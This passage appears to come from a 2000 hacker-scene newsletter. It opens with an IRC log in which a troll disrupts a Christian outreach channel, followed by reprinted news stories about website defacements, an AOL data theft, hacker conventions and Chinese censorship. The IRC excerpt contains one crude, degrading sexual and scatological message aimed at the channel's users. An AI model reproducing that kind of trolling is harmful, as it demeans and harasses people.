      <ShermAway> 1 cor 10:13
      <Denis>  No temptation has overtaken you but such as is common to man; and God is faithful, who will not allow you to be tempted beyond what you are able, but with the temptation will provide the way of escape also, that you may be able to endure it.
      <ShermAway> then believe it!!! God will provide an escape route out of all temptation
      <ShermAway> our part is to look for it
      <ShermAway> and then take it!
      <ShermAway> :)
      <joshua_4_jesus> sounds like a plan
      <ShermAway> no to give into the sin 
      <ShermAway> yep
      <ShermAway> it works well if you trust God to deliver you from temptation
      <ShermAway> He always keeps His promises
      <Denis> It is such a wonderful thing to see how weak we are josh, and then to see how God's power can give us the strength to be pure and holy.  He is always there with His strength and with a way of escape.
      <joshua_4_jesus> i just want to shove my hard pounding love muscle into his greasy asshole as we are embraced in hot gay sex.  i want to feel his manliness inside of me.  i want to grab that mouth of his and take a big fat shit in it
      <Denis> oh dear
      >>> You have been kicked off #gay_outreach by ShermAway (ShermAway)
       [#gay_outreach] Banned from channel
      IRC log ended Mon Jul 10 13:40:02 2000
       
       |
      -=-
       |
       |
      
      @HWA
      
      
      
      
267.0 [IND] Ex-KGB Major Leads US War Against Hackers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 12 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061200f_j.shtml
           
      6/12/00 
      
      Ex-KGB Major Leads US War Against Hackers
      Date: 10/06/2000 By BEN FENTON in Washington
      
      A former senior KGB officer who defected to America is patenting a new 
      device to thwart hackers and could be the saviour of the US computer 
      industry.

      Victor Sheymov is also poised to become the next "dot com" 
      multi-millionaire after he left the service of American intelligence to 
      found a "cybersecurity" company outside Washington.

      The ex-KGB major has even persuaded James Woolsey, a former director of 
      the CIA, to join his board of directors.

      Mr Sheymov was smuggled out of Moscow with his wife and daughter by the 
      CIA. Soon he was working for the highly secretive National Security Agency 
      (NSA) trying to find ways of breaking into the KGB communications systems 
      that he had designed.

      He turned to the private sector after falling out with the CIA over the 
      $1 million (670,000 pounds) he says he was promised as part of his 
      defection package. "The CIA cheated me in a major way," he told the New 
      York Times.

      Although he defected more than 20 years ago, he only settled his 
      differences with the American government last year. By then he had started 
      work on his "algorithm", a set of programming instructions for a computer, 
      which he believes can make any machine impregnable to hackers.

      Hacking has become a threat to America's military and corporate 
      infrastructure. Both the State Department and the FBI have been 
      embarrassed by breaches of computer security.

      The agency employs young hackers to test its own security and to break 
      into the systems of foreign governments, terrorist organisations and drug 
      syndicates.

      After perfecting his algorithm, Mr Sheymov used his former NSA colleagues 
      to test it. "We tried and we couldn't get in," said one expert hacker with 
      18 years of service at the agency.
      
      The Daily Telegraph
      
      http://www.smh.com.au:80/news/0006/10/text/pageone3.html 
      
      
      This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited. 
      
      
      
      
      @HWA
      
268.0 [IND] Flagship Hong Kong Govt Web Site Defaced, Twice
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 13 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061300a_j.shtml     
      
      6/13/00
      Flagship Hong Kong Govt Web Site Defaced, Twice
      By Adam Creed, Newsbytes
      HONG KONG, CHINA,
      13 Jun 2000, 12:02 AM CST
      
      A flagship Hong Kong Government Web site was defaced twice over the 
      weekend, resulting in its eventual closure and the start of criminal 
      investigations by local police authorities.

      The Interactive Government Services Directory (IGSD) was recently launched 
      in Hong Kong - promoted as an online gateway to government services 
      information for Internet users.

      On June 10, a spokesman for Hong Kong's Information Technology Services 
      Department confirmed the directory Web site front page had been defaced 
      during the afternoon.

      "Two messages were found attached on the home page of the IGSD shortly 
      after 3.30 pm," said the spokesman. "To facilitate investigations into the 
      incident, we closed down the system at about 3.45 pm."

      It is unclear what the nature of the security breach was and if any 
      changes were made to secure access to the site ... because at around the 
      same time the following day the Web site was again defaced.

      The service was then shut down and remains offline as of Tuesday Hong Kong 
      time.

      The spokesman said the site would remain offline in order to "solve the 
      problems created by two defacement cases over the weekend."

      According to the Information Technology Services Department, the IGSD Web 
      site is hosted on a stand-alone server separate from Hong Kong Government 
      internal computer networks.

      The Hong Kong Police are investigating the matter.

      The IGSD Web site can be found at http://www.igsd.gov.hk . 
      
      @HWA
      
269.0 [IND] Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 13 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061300b_j.shtml      
      
      6/13/00
      Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime
      
      The Federal Bureau of Investigation consults a 19-year-old student from 
      Sweden several times a week to discuss new strategies for their fight 
      against computer hackers, it has been revealed.

      News of Jonathon James' prowess as a cyber sleuth followed his 
      breakthrough in tracking down the culprit behind last year's Melissa 
      virus.

      And after news of the Love Bug broke in May, it was James who the FBI 
      turned to before its origins could be traced to the Philippines.

      So far more than 150 foreign journalists have called or visited him at his 
      home in Uppsala, a town just a few miles north of Stockholm.

      But despite mounting international fame, he is keen to play down his role 
      for the FBI, preferring to concentrate on his ongoing studies and plans 
      for a future business enterprise.

      However, he is prepared to offer some commentary on the current state of 
      global e-commerce and internet communications.

      While governments are generally still rather complacent about online 
      security, fears about online shopping are too often exaggerated, he told 
      Reuters reporters.
      
      Last updated: 12:18 Monday 12th June 2000.
      http://www.ananova.com/news/story/internet_us-internet-crime_142970.html 
      
      
      @HWA
      
270.0 [IND] Daemons on the Net: Stereotyping the hacker **
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 13 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061300c_j.shtml     
      
      6/13/00 
      
      Daemons on the Net
      Stereotyping the hacker
      Summary
      SunWorld columnist Carole Fennelly defends the term hacker and offers a rebuttal
      to "Invisible Enemies," a recent article in Vanity Fair which she calls "a 
      sensationalist, good-versus-evil script filled with the sort of cheap stereotyping
      found in TV movies." (700 words)
      
      
      
      --------------------------------------------------------------------------------
      
      http://www.idg.net/ic_188368_1794_9-10000.html 
      
      
      UNIX SECURITY    
      
      --------------------------------------------------------------------------------
       
      By Carole Fennelly 
      I was at a conference recently talking with the CEO of a computer security company who
      emphatically stated, "We don't hire hackers." Curious, I asked if she meant that her company
      doesn't hire people with criminal records. She clarified: "We don't hire people who attend 
      DefCon, have online handles, or who participate in hacker forums. Or who hang around with 
      hackers." In other words, her company doesn't hire people who don't conform to the mainstream.
      I wonder how she and her HR department determine which job candidates are associating with 
      undesirables? 
      
      Is that perhaps why the term hacker is so controversial? Because hackers don't conform? The
      US Founding Fathers didn't conform, either. Down through the ages, any group that didn't conform
      to mainstream society was subject to various forms of persecution: the Inquisition, the Salem 
      witch trials and, more recently, the McCarthy hearings. 
      
      It's rather ironic that the United States, which was founded on the principles of accepting 
      diversity, supported McCarthy's modern version of a witch hunt. It's comforting to look back on
      those days of investigating subversives as a black moment in the history of democracy, from which
      we have thankfully learned a lesson. 
      
      But have we? The June issue of Vanity Fair has an article by Bryan Burrough titled 
      "Invisible Enemies." According to the editor, this is supposed to be an article detailing 
      "high-tech procedural detective work." In reality, it is nothing more than a sensationalist, 
      good-versus-evil script filled with the sort of cheap stereotyping found in TV movies. Perhaps 
      that was what Burrough was looking for in the first place. Who cares about the facts? After all,
      this is Vanity Fair -- entertainment, not real news. 
      
      I care. I care because I work in an industry where I have to deal with the consequences of this
      stereotyping. Burrough picked up on the squeaky-clean image of J.P. Vranesevich, founder of 
      AntiOnline, and cast him as the Hero of this little melodrama. It doesn't matter that Vranesevich
      is nothing more than a paid snitch with limited technical ability; he looks wholesome. He fits 
      the part of Upstanding American Youth. 
      
      Burrough chose Vranesevich's harshest critic, Attrition.org founder Brian Martin, to play the Villain.
      After all, Brian looks like he just stepped off the set of The Crow and hangs around with subversives.
      It doesn't matter that he is a six-year veteran of the professional security field and has the respect
      of law enforcement and journalists. He looks dangerous. He fits the part of the Evil Hax0r. 
      
      I won't get into the specifics of everything that's wrong with this 10,000-word article (though the 
      fact that it is 10,000 words too long is its first problem). Brian posted a rebuttal on the Attrition 
      site that addresses some of the issues. 
      
      "But", a techie might argue, "what do I care? I just want to know about the latest product releases
      and bugs. I don't care about that other stuff." Well, upper management does, and, like it or not, 
      managers set the policies that govern how the techies play with the bits and bytes. Do you really want
      your managers to decide what nightclubs are acceptable for you and your fellow employees, and dictate
      the sort of person with whom you may associate? 
      
      "Oh, that'll never happen," you might say. Yeah. And we didn't think McCarthyism could happen here 
      either. McCarthyism isn't dead -- it's just found a new target.  
      
      About the author 
      
      Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security
      consulting. She has been a Unix system administrator for almost 20 years on various platforms, and 
      provides security consultation to several financial institutions in the New York City area.  
      
      @HWA
      
271.0 [IND] China: Defiant Cyber Surfers Play Cat-and-Mouse Game
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 13/(8th) 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061300d_j.shtml     
      
      6/13/00
      China: Defiant Cyber Surfers Play Cat-and-Mouse Game
      JOSEPHINE MA Thursday, June 8, 2000
      
      http://technology.scmp.com/internet/DAILY/20000608084435429.asp 
      
      Published on Thursday, June 8, 2000
      INTERNET 
      
      
      Defiant cyber surfers play cat-and-mouse game 
      JOSEPHINE MA 
      
      Defiant cyber surfers in mainland China can run Web sites and circumvent 
      police control by using overseas service providers. The Web site run by 
      Huang Qi - 6-4tianwang.com - operates via a US-based Internet service 
      provider. This means its content can be updated either on the mainland or 
      in the United States and mainland surfers can easily slip through filters 
      set by mainland cyber police. 

      The site was still accessible on Wednesday and a statement about Mr 
      Huang's arrest - apparently by its operators in the US - was posted on its 
      homepage on Wednesday night. The chat room also remained open. When the 
      authorities try to block sites like 6-4tianwang.com, surfers can still 
      manage to access them by using overseas or other methods. 

      The Web site was launched in June last year as the first in China 
      dedicated to helping people find relatives abducted by traffickers. 

      The case of 6-4tianwang.com highlights the difficulties faced by mainland 
      authorities in policing the Internet. 

      Cyber police have issued numerous regulations to tighten their grip on the 
      Internet. And the State Council recently set up a special division under 
      its Information Office to monitor news on the Web. But there are plenty of 
      indirect routes to post messages on the net and there are always ways to 
      access them. 

      Examples include discussions about the 1989 Tiananmen Square crackdown - a 
      subject considered taboo by the authorities. No matter how fast Web 
      masters move to delete messages posted on their chat rooms, surfers can 
      always shift to other chat rooms to continue their discussions. 

      It was not the first time Mr Huang had been in trouble with the 
      authorities. The Web site was shut down by police in March over reports 
      concerning the human rights of Chinese labourers working overseas. It was 
      reopened in April apparently with the help of a US-based Chinese group. 

      Undeterred, Mr Huang went further late last month and began to post news 
      related to the 1989 democracy movement on the Web site, until his arrest 
      on Saturday. 
      
      @HWA
      
272.0 [IND] Hacker's Humorous Tips to Websites
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 13/14 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061400a_j.shtml     
      
      6/14/00
      Hacker's Humorous Tips to Websites
      
      KUALA LUMPUR: In a somewhat amusing vein, "Xenophoria,'' the hacker who 
      hacked into anti-reformasi websites, went online yesterday to offer tips 
      to pro-reformasi websites to protect them from being hacked.

      In a letter to Malaysiakini, Xenophoria advised the pro-reformasi 
      webmasters to stop using the US-based Tripod service to host their 
      websites.

      Saying the tripod.com security system was "rather weak,'' he added: "If 
      Junior Hacker, who breached the Laman Reformasi website, found a hole in 
      tripod.com, there is every possibility that other pro-reformasi websites 
      would suffer the same fate.''

      On Friday, the popular Laman Reformasi, also known as Mahazalim, was 
      hacked by someone who called himself "Junior Hacker,'' who posted an 
      obscene picture of a man sodomising another.

      This was an apparent reference to Datuk Seri Anwar Ibrahim, who is 
      currently undergoing trial for allegedly committing sodomy.

      Tripod then cancelled the website's membership, stating that "storing 
      adult content'' was in clear violation of the terms of service agreement.

      In the letter, Xenophoria said he had himself proven the tripod.com 
      security system was rather weak by hacking the http://bnlist.com website. 

      
      Tuesday, June 13, 2000
      http://www.thestar.com.my/online/newsreport.asp?file=/2000/6/13/nation/1304szpa.asp&newspage=nation 
      
      The Star      
            
      @HWA
      
273.0 [IND] r00tfest 2000: Computer Hackers Ride into Town Today
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 14 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061400b_j.shtml     
      
      6/14/00
      http://www.pioneerplanet.com/yhoo/mtc_docs/020426.htm 
      
      Computer Hackers Ride into Town Today
      RiverCentre is site for `RootFest 2000' 
      
      
      --------------------------------------------------------------------------------
      LESLIE BROOKS SUZUKAMO STAFF WRITER 
      --------------------------------------------------------------------------------
      
      It's billed as the Midwest's largest computer security convention, but 
      when the three-day RootFest opens in St. Paul's RiverCentre today, think 
      of it simply as hackers' heaven.

      Heaven, after all, is supposed to be fun, and, in this case, for good 
      hackers. And that's what RootFest hopes to promote -- hackers as the guys 
      in the white hats who actually improve security on the Internet as they 
      light up brain cells and hard drives trying to poke holes in computer 
      security systems.

      ``A lot of the mainstream press and the public at large view hacking as 
      synonymous with criminal activity. They believe every hacker is a criminal 
      and that's just not true,'' said Michael Monson, RootFest's founder and 
      organizer.

      ``Hacking isn't just about breaking into computers,'' Monson said. 
      ``Hacking is about learning and making computers do things they were not 
      originally designed to do -- taking it a step further.

      ``Making a program run faster or use less power would be a good hack,'' he 
      said, as an example.

      Monson is a hacker. He's 21, soft-spoken and wears a goatee, a tiny silver 
      stud in each earlobe, and a skinny ponytail over the collar of his neat 
      white polo shirt and khaki slacks. No one online knows him as Monson, 
      though.

      Instead, he's Lothos, named after the head vampire character from the 
      ``Buffy the Vampire Slayer'' movie, and a member of the Legions of the 
      Underground, a worldwide hackers community in cyberspace. He's also a 
      computer network security engineer.

      He said it was two years ago when he conceived of RootFest with ``root'' 
      -- in this case -- referring to a starting directory in a computer. He had 
      heard about Defcon, another larger, older hacker convention held annually 
      in Las Vegas, and thought, ``That's pretty cool. I wish I could go.''

      He figured there were other hackers from the Midwest who couldn't afford a 
      junket to Vegas, so he threw together the first RootFest at the 
      Minneapolis Convention Center last spring. That effort attracted 200 
      people, primarily from the Midwest, but also from as far away as 
      California and the Netherlands, he said. It's estimated that up to 1,000 
      may attend this year.

      The first convention also attracted attention, not all of it positive. The 
      head of Minneapolis' information technology systems put out an e-mail that 
      warned city computer users to be extra careful while the hackers were in 
      town.

      ``Sometimes, these individuals hack into computers to perform fairly 
      harmless computer pranks; however, that is not always the case,'' warned 
      Don Saelens, the chief information officer for the city of Minneapolis.

      No trouble was reported, however. Saelens said recently that he was 
      responding to the fears of department heads who had heard about the 
      convention ``and tend to respond a little emotionally.''

      The 50-year-old information chief said his younger ``tool-smart'' staffers 
      especially enjoyed the convention. Some of them even participated in the 
      hacking contest, in which contenders lug their home computers into the 
      convention center, plug into a network closed off from the Internet and 
      try to hack into other contestants' computers.

      ``They really loved talking tech with each other,'' Saelens said.

      Jim Kavaloski, director of information services for Ramsey County, said he 
      is not concerned about the hackers hitting town. The county already uses 
      state-of-the-art anti-virus software for its 2,900 personal computers, he 
      said.

      ``When we talked about it, we asked ourselves what we could do and really, 
      there's nothing more you can do,'' Kavaloski said, adding, ``The iloveyou 
      virus came from the Philippines, after all. They don't need to be in St. 
      Paul.''

      Monson hopes law enforcement and computer security experts mingle with 
      hackers and exchange ideas. Some security experts like himself once were 
      hackers who thrilled to the challenge of penetrating a system in the same 
      way that mountain climbers try to scale tall peaks -- because they are 
      there.

      John Edwards, a special agent with the Minnesota Bureau of Criminal 
      Apprehension who specializes in computer crimes, agrees that not all 
      hackers are malicious.

      ``The Bill Gateses and Steven Jobs of the world built all these computer 
      companies, but they were once hackers,'' he said.

      Sgt. Brook T. Schaub of the St. Paul Police Department, another computer 
      crime specialist in the sex crimes unit, also divides hackers into the 
      ``white hats'' and ``black hats'' -- those who pierce security systems and 
      may install a banner announcing they were there and those who break into 
      systems to wreak havoc or steal private data like credit card numbers.

      However, Schaub noted that even white hats who hack simply for the joy of 
      solving a difficult puzzle are committing, at the very least, a 
      misdemeanor when they break into a system. Black hat hackers can receive 
      up to 10 years in prison for felony break-ins that cause more than $2,500 
      in damage, he said.

      Most hacking crimes go unreported, the officers said, because companies 
      are not eager to reveal system vulnerabilities or scare their customers. 
      Edwards estimates 80 percent of computer crime is committed by disgruntled 
      employees or former employees, not outside hackers.

      Monson said he and other hackers condemn destructive attacks such as those 
      earlier this year that shut down systems serving sites like eBay and 
      amazon.com. He hopes the convention will earn the hackers respect.

      ``I hope so,'' he said. ``I believe it will happen.'' 
      
      
      
      --------------------------------------------------------------------------------
      Leslie Brooks Suzukamo can be reached at lsuzukamo@pioneerpress.com or at
      (651) 228-5475.
      
      
      Hackers, crackers and script kiddies
      
      Not every hacker is a cracker, and all have a disdain for script kiddies.
      Here's a short ``who's who.'' 
      
      Hacker. Someone who picks apart a computer system and delights in the intricacies.
              Sometimes, a hacker penetrates a computer's security system just to test 
              the system's integrity, then notifies the owner of holes in the system. Other
              hackers tinker with systems the way hot-rodders tinker with cars, souping 
              them up to run faster, smoother or use less power. 
      
      Cracker. A term most hackers use for hackers who specialize in penetrating or 
              ``cracking'' into a computer system. Often, this term refers to hackers with
               malicious intent who attempt to wipe out data or steal it. 
      
      Script kiddie. A term of derision used to describe hackers/crackers who break into
              computer systems, not by writing their own computer code, but by copying 
              prewritten code they find on the Internet. Most are young or don't have the
              skills needed to hack into a system by themselves. 
      
      @HWA
           
xx.x [IND] June 19 Hackers Steal Subscriber Data From AOL Network
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 19 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061900a_j.shtml     
      
      6/19/00
      Hackers Steal Subscriber Data From AOL Network
      By Ariana Eunjung Cha, Washington Post Staff Writer
      WASHINGTON, D.C., U.S.A.,
      19 Jun 2000, 12:07 PM CST
      
      Hackers broke into America Online Inc.'s computer network this week and pilfered 
      information such as names, addresses and credit-card numbers from some subscribers,
      company officials said late yesterday.
      
      AOL spokesman Rich D'Amato said only "a very limited" number of the records of the
      company's more than 23 million subscribers had been accessed and that the company 
      had begun contacting those customers directly. He said AOL was working with law 
      enforcement officials to investigate the matter.
      
      "We are taking these claims very seriously," he said. "We employ the highest level
      of security and we have already deployed additional security to prevent this from 
      happening again."
      
      D'Amato said hackers first compromised some employee accounts by tricking them into
      downloading a Trojan horse program that allowed them to hijack the accounts. They 
      then used those customer service accounts to access subscriber data.
      
      News about the security breach was posted Thursday on the Observers.net Web site, a
      popular gathering place for current and former employees and volunteers of AOL, and
      spurred the company's investigation, D'Amato said. The Observers.net site said 
      information was stolen from about 500 subscribers.
      
      Kelly Hallissey, one of the Observers.net site's administrators, said yesterday that
      the trouble began about a week and a half ago inside one of the Internet's original 
      chat rooms. She said 20 to 30 people were in the chat room when one of them started 
      bragging about how he could break into AOL. When challenged, he offered step-by-step
      instructions on how to get into the company's Customer Relations Information System.
      
      "Someone ran his mouth and the next thing I knew everyone was talking about how to 
      break in," she remembered.
      
      On Thursday, Hallissey said she logged on to find several e-mails with screen shots
      of her own records, including the entire credit-card number she had used to sign up
      to AOL.
      
      AOL's status as the world's largest online service makes it a popular target for 
      hackers. Last October, a teenager pleaded guilty to altering data and programs on
      AOL's internal systems, which would cost $50,000 to fix.
      
      Mark Chen, chief technology officer at Palo Alto, Calif.-based Securify.com, said 
      the latest attack on AOL was fairly simple but deadly, because once someone gets 
      through the security perimeter, he has access to "all the powers of a person on 
      the inside."
      
      A Colorado Springs teen who goes by the online moniker Ytcracker--and was one of
      the authors of the Observers.net posting--said he is part of a group of seven young
      men who spend their time probing the vulnerabilities of AOL's vast network.
      
      "It's a pretty interface and it looks secure enough. But when you dig down deep, 
      there is a lot of stuff you can compromise," he said in an interview. 
      
      
      
      
      @HWA
      
274.0 [IND] UK Watchdog Warns Net Banks Over Hackers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 20 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062000a_j.shtml
      
      6/20/00
      UK Watchdog Warns Net Banks Over Hackers
      By Sylvia Dennis, Newsbytes
      LONDON, ENGLAND,
      20 Jun 2000, 7:24 AM CST
      
      The Financial Services Authority (FSA), the UK's financial services regulator, has 
      told banks that they must take more care with their online security.
      
      The warning comes after the FSA found inadequacies in defense systems against hackers
      on the sites of several unnamed UK Internet banks.
      
      Speaking on Monday at the British Bankers Association, Howard Davies, the chairman of
      the FSA, said that online banks also need to pay more attention to strategy and to coping
      with unexpectedly large numbers of users.
      
      Davies added that the FSA's research had identified the key risks that banks must manage 
      as they introduce and develop their e-banking services.
      
      He said that there is a definite need for senior management to be firmly in charge of 
      their Internet strategies, as well as to effectively manage their security risks.
      
      In his speech, he also outlined the reputation risks of rushing products to the market 
      too early, with the result that online users become frustrated with problems they encounter.
      
      Davies added that there is also a strategic and business risk with online banking services.
      Senior management, he said, needs to be firmly in charge of the direct effects of their 
      Internet strategies, and of the potential indirect effects on the underlying profitability 
      of their business.
      
      "There is a risk that people with strong technological, but weak banking skills can end up 
      driving e-initiatives. One consequence may be that these initiatives do not attract the 
      types of customers that banks want or expect, and may have unexpected implications for 
      existing business lines," he said.
      
      "Banks may face new competition too. E-banks are easy to set up, so lots of new entrants are
      arriving on the scene. And old-world systems, cultures and structures do not encumber these 
      new entrants," he added.
      
      This issue, he went on to say, was closely linked to business risk, key elements of which, 
      such as the ability to assess credit and liquidity risk, present themselves in new guises in
      an e-banking world.
      
      The good news for the e-banking world, Davies told his City audience, is that UK banks have 
      found little evidence of material success for hackers.
      
      "This suggests that, for the moment, they have in place sufficiently robust barriers to repel
      attacks attempted on their gateways," he said, adding that banks should be careful not to get
      too confident about the issues involved.
      
      "While banks tend to have reasonable perimeter security, we have sometimes found insufficient
      segregation between internal systems, and poor internal security. So we are encouraging banks
      to look at the firewalls between their different systems to ensure adequate damage limitation
      should an external breach occur," he said, adding that, as ever, the greatest threat so far 
      has been from the enemy within.
      
      Davies said that it is now very difficult in the Internet environment to predict and manage 
      the volume of customers that e-banks will obtain.
      
      Many banks going online, he said, have significantly misjudged volumes, usually making estimates
      which turn out to be too cautious.
      
      "When a bank has inadequate systems to cope with demand there may be both financial and reputational
      damage, and even compromises in security," he said.
      
      The FSA's Web site is at http://www.fsa.gov.uk . 
      
      @HWA
      
275.0 [IND] Hacker Attacks Gun Control Group's Web Site
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 21 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062100a_j.shtml     
      
      6/21/00
      Hacker Attacks Gun Control Group's Web Site
      By Martin Stone, Newsbytes
      WASHINGTON, DC, U.S.A.,
      21 Jun 2000, 7:34 AM CST
      
      The Web site of nonprofit gun-control group Violence Policy Center was 
      reportedly attacked by an apparently pro-gun hacker who left the message, 
      "If you take my guns, I still have my computer. VPC just got shot in the 
      head."

      An Associated Press report today said the site was also defaced with 
      images of bombs, a skull and crossbones and obscenities. In addition, the 
      report said, all of the group's e-mail had been rerouted to the hacker.

      The intrusion was discovered Monday and reported to the FBI, according to 
      the report. The group's domain name registrar, Network Solutions Inc. of 
      Herndon, Va., was asked to restore the VPC Web address. Network Solutions 
      said the process would take 12 to 24 hours.

      AP said that public Internet registration records showed the "vpc.org" 
      name to be registered to a Ted Torian, which appeared to be an alias, at 
      an address in Los Angeles. VPC said it has no knowledge of that name, and 
      though the group has a Los Angeles office, it's not at that address and 
      the phone numbers listed on the registration records are not in service.

      An e-mail apparently intercepted by the hacker had been rerouted to an 
      anonymous Yahoo mail account and the AP said investigators discovered the 
      account had been accessed through a computer at the University of Nebraska
      at Lincoln. 
      
      @HWA
      
276.0 [IND] Hackers Attack Nike, United Arab Emirates Sites
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      June 22 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_062200a_j.shtml
      
      6/22/00
      Hackers Attack Nike, United Arab Emirates Sites
      By Martin Stone, Newsbytes
      MONTREAL, QUEBEC, CANADA,
      22 Jun 2000, 7:07 AM CST
      
      Hackers struck at two prominent Web sites Wednesday, one belonging to 
      sportswear giant Nike Corp. in an apparent attempt to disrupt an economic 
      forum in Australia, the other operated by the government of the United 
      Arab Emirates.

      An Associated Press report today said officials at Nike notified the FBI 
      after discovering a hacker had diverted access from its Web site to a site 
      devoted to disrupting an international economic forum in Australia. The 
      report said Nike computers were never breached and its electronic security 
      protected all online customers.

      A Reuters report today said a British man is in custody under suspicion 
      for hacking into the UAE Internet system. He faces charges of damaging the 
      country's economy, according to local newspaper reports today. Reuters 
      said the 26-year-old man, a senior computer engineer in Dubai, was 
      arrested last week after being traced by Emirates Telecommunications Corp. 
      (Etisalat) security staff.

      The reports cite Dubai police chief Major General Dhahi Khalfan Tamim as 
      saying the unidentified Brit could be charged with damage to the UAE 
      economy if shown he destroyed data in the Web system. Dubai does not have 
      specific computer crimes laws, but the suspect could receive up to 10 
      years in prison, the reports said.

      Reuters said Etisalat officials blame the suspect for much of the 
      disruption experienced by local Web users in the past two weeks. Dubai has 
      been pushing to become a regional hub for information technology and 
      electronic commerce and last year invested $200 million in establishing an 
      e-commerce and IT free-trade zone, called Dubai Internet City.

      Associated Press said that for six hours access to the Nike site was 
      diverted through computers operated by various Internet service providers, 
      including FirstNET Online in Edinburgh, Scotland, to the destination, 
      http://www.s11.org, a page proclaiming "Global justice is coming - prepare 
      now!" The page also included messages urging protesters to gather Sept. 
      11-13 at the World Economic Forum in Melbourne, Australia.

      The s11 Web site uses British spellings and describes itself as part of
      a "network of organisations, affinity groups and individuals that all share
      a common concern about the growth of corporate power and the direction of 
      globalisation," the AP report said. 
      
      @HWA
      
277.0 [IND] Rock Band's Answer To Napster: Sabotage
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 22 2000
      Source: www.infowar.com
      http://www.infowar.com/hacker/00/hack_062200b_j.shtml
      
      6/22/00
      Rock Band's Answer To Napster: Sabotage
      By Kevin Featherly, Newsbytes
      OAKLAND, CALIFORNIA, U.S.A.,
      22 Jun 2000, 12:42 PM CST
      
      From the left bank of the US, Oakland, Calif., there is fomenting a plot 
      to overthrow the much-blasted Napster music file-sharing system - by using 
      Napster against itself.

      A Web site belonging to the obscure Clash-meets-Lou-Reed rock combo The 
      Tabloids (http://www.stopnapster.com ), is publicly campaigning for 
      guerrilla tactics against the MP3-swapping service that many contend is 
      violating artists' and record labels' copyrights by allowing users to give 
      music to each other without paying for the pleasure. And the plan, 
      according to the site, is sabotage.

      The site encourages anti-Napsterites to use Napster itself to send out 
      "Trojan Horses" and "Napster bombs" to disrupt the service - while causing 
      no harm to anyone's computer.

      "Here's a suggestion for making effective electronic counter measures that 
      thwart MP3 file sharing in violation of copyright laws," said the site, 
      which is registered to Tabloids lead singer, songwriter and guitarist 
      Michael Robinson. "From now on, prerecorded music is released in two 
      digital formats: the original compact disc as well as Trojan Horse MP3 
      files, which are non-destructive, digital decoys."

      The result? Say a user downloads one of Eminem's new releases. They are 
      happily listening to the purloined tune when suddenly Charlton Heston 
      begins reading a public interest message opposing song theft. "The Trojan 
      Horse does nothing to hurt your hard drive, computer or files," the site 
      says. "But it's annoying."

      The effort has done very little to ingratiate the band with hardcore 
      Napster users, who have taken to online chat sessions in droves to decry 
      the band's technological short-sightedness and to accuse Robinson and crew 
      of exploiting the Napster controversy to put their little-known band in 
      the public eye.

      All of which, Michael Robinson says, couldn't matter less.

      "My wife and I sat down and just went through all of the objections that 
      people would have," Robinson told Newsbytes this morning. "It's like a 
      ping-pong ball hitting a tank as far as I'm concerned. It doesn't hit me, 
      I don't care, because really, ultimately, I have a history of speaking out 
      on issues."

      True enough. Robinson is not your average high school dropout who formed a 
      punk-rock group. He is a former journalist, a professional photographer, 
      and a published author whose now out-of-print 1990 book, "Overdrawn," took 
      on the late 1980s savings and loan crisis.

      "The constitutional aspect of this is really what is driving me more than 
      anything else," he said. "I thought about it long and hard, my wife and I 
      went through a lot of skull sessions. And I'm not going to sit on the 
      sidelines of this fight."

      As for accusations that he is engaging in a publicity stunt, Robinson has 
      this retort. "They can think whatever they want; it doesn't matter or 
      faze me. My default is that I'm amazed by the implications of this. If 
      you think about it, if this Napster thing continues, then everything is up 
      for grabs. Your song can be used on a soundtrack without your permission, 
      Coca-Cola could use your songs in an advertisement. If you don't put this 
      as a Maginot Line right now, where does it go? What about patents, what 
      about authors, what about photographers?"

      The issue arises at a time when the industry, and some artists, are 
      pulling together to take aim at music file-sharing, and Napster is the 
      target's bull's-eye. The Recording Industry Association of America, 
      representing a number of major record labels, is suing the service and 
      seeking to shut it down. The Wall Street Journal reported today that a 
      group called Artists Against Piracy, also backed by the labels, is 
      planning an anti-Napster media blitz this summer.

      Robinson, who says he is not affiliated with the major labels, said his 
      target is not primarily Napster users themselves, but political leaders 
      whose job it is to shape and create laws, and to protect the old ones. 
      Robinson cites the US Constitution's Article 1, Section 8, as proof that 
      the activity Napster and its users are engaging in is illegal and 
      unconstitutional. That section says Congress shall have the power "to 
      promote the progress of science and useful arts, by securing for limited 
      times to authors and inventors the exclusive right to their respective 
      writings and discoveries."

      A survey released yesterday indicated that Napster users do not agree. The 
